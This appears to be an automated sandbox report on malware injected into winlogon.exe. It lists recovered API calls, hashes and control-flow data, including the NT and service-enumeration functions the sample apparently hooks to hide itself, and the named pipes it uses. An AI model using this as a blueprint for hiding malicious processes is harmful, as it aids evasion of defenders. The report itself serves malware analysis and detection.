                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589817E5
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981805
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E858981820
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981840
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E85898185B
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E85898187B
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E858981896
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589818A0
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1534210851-0
                                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction ID: 4bfe8da4bf64d09d75688e0bc86698689cfa1098149370d4ad6d534f2979ed62
                                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction Fuzzy Hash: D7317771231AC2D6EB50BB26DA513FDF3A9AF84BD0F0454339E0D87699FE24C8918A10

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 350 1e8589b273c-1e8589b27a4 call 1e8589b29d4 * 4 359 1e8589b29b2 350->359 360 1e8589b27aa-1e8589b27ad 350->360 362 1e8589b29b4-1e8589b29d0 359->362 360->359 361 1e8589b27b3-1e8589b27b6 360->361 361->359 363 1e8589b27bc-1e8589b27bf 361->363 363->359 364 1e8589b27c5-1e8589b27e6 VirtualAlloc 363->364 364->359 365 1e8589b27ec-1e8589b280c 364->365 366 1e8589b2838-1e8589b283f 365->366 367 1e8589b280e-1e8589b2836 365->367 368 1e8589b2845-1e8589b2852 366->368 369 1e8589b28df-1e8589b28e6 366->369 367->366 367->367 368->369 372 1e8589b2858-1e8589b286a 368->372 370 1e8589b2992-1e8589b29b0 369->370 371 1e8589b28ec-1e8589b2901 369->371 370->362 371->370 373 1e8589b2907 371->373 379 1e8589b28ca-1e8589b28d2 372->379 380 1e8589b286c-1e8589b2878 372->380 375 1e8589b290d-1e8589b2921 373->375 377 1e8589b2923-1e8589b2934 375->377 378 1e8589b2982-1e8589b298c 375->378 383 1e8589b2936-1e8589b293d 377->383 384 1e8589b293f-1e8589b2943 377->384 378->370 378->375 379->372 381 1e8589b28d4-1e8589b28d9 379->381 385 1e8589b28c5-1e8589b28c8 380->385 381->369 387 1e8589b2970-1e8589b2980 383->387 388 1e8589b2945-1e8589b294b 384->388 389 1e8589b294d-1e8589b2951 384->389 385->379 386 1e8589b287a-1e8589b287d 385->386 390 1e8589b28a7-1e8589b28b7 386->390 391 1e8589b287f-1e8589b28a5 386->391 387->377 387->378 388->387 392 1e8589b2963-1e8589b2967 389->392 393 1e8589b2953-1e8589b2961 389->393 395 1e8589b28ba-1e8589b28c1 390->395 391->395 392->387 394 1e8589b2969-1e8589b296c 392->394 393->387 394->387 395->385
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284708688.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: c921608bc3ed8dae174af04d789195309c5edfcc0c714fa749226a5546365456
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: 7161DD32B29690CBEB548F95D1007ADF3A2FB54BA5F588136DE5D07788DE38D852C700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                          • API String ID: 2119608203-3850299575
                                                                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction ID: 04a661148b50104311287319c74e3cfe1c909468e327bc71e4abbcab7385a8c3
                                                                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction Fuzzy Hash: A6B15476220AD2C6EB699FA5D8407EDF3A5FB84B84F445027EE0D57B95EE35C880CB40
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction ID: c25654e1fbf133ad71a07c6f0efe47fc9d8043adbf42997a59493c9db71f9faa
                                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction Fuzzy Hash: 41313B76225BC1DAEB609F60E8807EDB365FB84744F44442ADA4E57B99EF38C648CB10
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction ID: 0fd8bee66b9aa75a719588d4164310d191915e835c40ed0449f42a8a8d7cafff
                                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction Fuzzy Hash: A5313D36224BC1D6EB60DB25E8403EEB3A4FB89754F500126EE9D53B59DF38C555CB00
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                          • String ID:
                                                                          • API String ID: 2933794660-0
                                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction ID: 34985af1e6a69c2e887ac8394de09c6f631af6656f7e96728bd996360b5e390c
                                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction Fuzzy Hash: 7D111C36720F91C9EB109B60E8553AD73A4FB19758F440E32DE6E467A4DF78D1988380
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                          • Instruction ID: 30bb9f7e9d87a9d9c65bc2380062ff3bad17e1f141d89e57fb0a08f8465aebfb
                                                                          • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                          • Instruction Fuzzy Hash: C551B5327246D1D9FB209B72E8407EEBBA5FB84794F144126EE9D67B95DE38C501CB00
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284181890.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                          • Instruction ID: 1e72e37fc9f235eb4f944ff72101e8db7dacc5524e3e801771df4715c73e88ad
                                                                          • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                          • Instruction Fuzzy Hash: 1BF0F4716356948EDB988F69E443759B7A1F748384FD0812ADA8EC3A14DB3C8455CF14

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                          • String ID: d
                                                                          • API String ID: 2005889112-2564639436
                                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction ID: c2281e23739868d66036d4294d6c0683aafed4b8ecad6af3162b140505f798a1
                                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction Fuzzy Hash: 4E512B36224BC5C6EB65DF62E54439EB7A2FB89BD9F044126DE4A07768EF38C0458B00

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                          • API String ID: 4175298099-1975688563
                                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction ID: eae4a35ccf18d1ff6c879c1ad54c2bd4091f653bf096b8bfe55e41d2011e4d15
                                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction Fuzzy Hash: 35316074130ACBE0EA45EBA9EDA16ECF322FF84344F8050339C1D12565AF788289CB50

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284708688.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 5a678c2123d8270ec6fb616ddb0a075a8484000318cf7b7c2c8d3db3c22f7b07
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 2E818B316282C1CEFB92AB65D8413DDF6A0EF85B82F5481379E8D87796DF39E8458700

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284181890.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: dbfcc5e9c0d96a37b9fd7991c7f30359c355952af576fe6994b0ae7cc5e7709f
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: CB817B317352C1CAFA96AB66D8513DDF3A0AF85782F548037AE4D87796DF38C94A8700
                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 000001E85898CE37
                                                                          • FlsGetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CE4C
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CE6D
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CE9A
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CEAB
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CEBC
                                                                          • SetLastError.KERNEL32 ref: 000001E85898CED7
                                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF0D
                                                                          • FlsSetValue.KERNEL32(?,?,00000001,000001E85898ECCC,?,?,?,?,000001E85898BF9F,?,?,?,?,?,000001E858987AB0), ref: 000001E85898CF2C
                                                                            • Part of subcall function 000001E85898D6CC: HeapAlloc.KERNEL32 ref: 000001E85898D721
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF54
                                                                            • Part of subcall function 000001E85898D744: HeapFree.KERNEL32 ref: 000001E85898D75A
                                                                            • Part of subcall function 000001E85898D744: GetLastError.KERNEL32 ref: 000001E85898D764
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF65
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF76
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 570795689-0
                                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction ID: f86b91cb66a3c6f8454f4038e5b621bb7ea2211ae881aec1b10a116c1fa3f1b4
                                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction Fuzzy Hash: 96416E302312CAC6FAA8A735D5553FDF2425F847B8F541736AD3F476E7DE2888018A40
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2171963597-1373409510
                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction ID: 51a05a011626c34f84d443abd0de517d886d5e25bc20737c8bb9c705d9869c07
                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction Fuzzy Hash: A5211D36624781C2EB109B25F5543ADB7A1FB89BE5F504226EE5E02AA8DF7CC149CF00
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284708688.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: ea488144e67ee9814cb3c00e2a8ac0c782a2014a7bbb5d57e2db9a248e5ddb93
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: F4E18D72628BC1CAEB609F65D4813DDB7A4FB89B99F100126EE8D57B9ADF34C491C700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction ID: fb0b219c5a3f278c8c4be7db907598bc1cd6189e151ec6c18a9f6efa96547db1
                                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction Fuzzy Hash: 48E15A73624B82CAEB609B65D4803DDB7E0FB55798F140126EE8D57B99CF38D481CB02
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284181890.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: ea3d8d01707ad5d94a13b4fba9cf6eb05f996a68f408e0993dfcc1eae4dccdcf
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: AFE16972624B81CAFB609B65E4813DDB7A4FF85B99F100126EE8D57B9ACF34C591CB00
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-537541572
                                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction ID: 44c234c9404ffe7b5e1619124c70eb274fb59fe55c9541b10c09b14d45380197
                                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction Fuzzy Hash: 2C410032331A92C1EA16DB66E8087DEB391FF49BE0F19513B9D0E97786EE38C4458700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                          • String ID: d
                                                                          • API String ID: 3743429067-2564639436
                                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction ID: 9981850cc48d31037741c2cded26c72f9a92758d62ae1b8330bcbb02fb765734
                                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction Fuzzy Hash: 5F414F73224BC4C6E760DF61E44479EB7A1F789B98F44812ADE8A07B58DF38C585CB40
                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D087
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0A6
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0CE
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0DF
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: 1%$Y%
                                                                          • API String ID: 3702945584-1395475152
                                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction ID: 9c311fea4b2fa3c9ab43cbea4d372c8830d6ac0f2b4a448fbd82eec820a9dce2
                                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction Fuzzy Hash: A8110A717242C6C1FA68AB25D9513FDF1416FC47F0F546336AC3E476EADE68C4028A00
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 190073905-0
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: f82d139e0262af235c5c503c080292d7917c2a0aa74f472ae0aed1caa77cd681
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 5F816B396202C3EAFB50AB65E8813EDF691AF85780F544437AD0DA7796EE38C8458F11
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          • API String ID: 2559590344-2084034818
                                                                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction ID: ed1d6103eff1dcc676994d656ad2f911c5872803e8dc8710478f2b646a537078
                                                                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction Fuzzy Hash: F831A4313226C2E2EE229B42E4407EDB694BF48BA0F5905379D5E47792EF39C4658B10
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          • API String ID: 3230265001-3130406586
                                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction ID: 848c5f808f98b7fe64fe1be9f14dffa162bf3ffb4f70aadf000dfa4e6251c1b3
                                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction Fuzzy Hash: C6115B31320AC0C6E7619B56E84439DB6A1FB88FE4F444226EE5E877A4DF38C8148744
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: dialer
                                                                          • API String ID: 756756679-3528709123
                                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction ID: c1fd6422857e38418c878c4cd41444f40647f04957361f5aedf899a272e96910
                                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction Fuzzy Hash: 22315A32721B92C2EA15DF96E5407ADF7A1BF44B84F0841329E4D47B59EF38C4A1CB00
                                                                          APIs
                                                                          Memory Dump Source
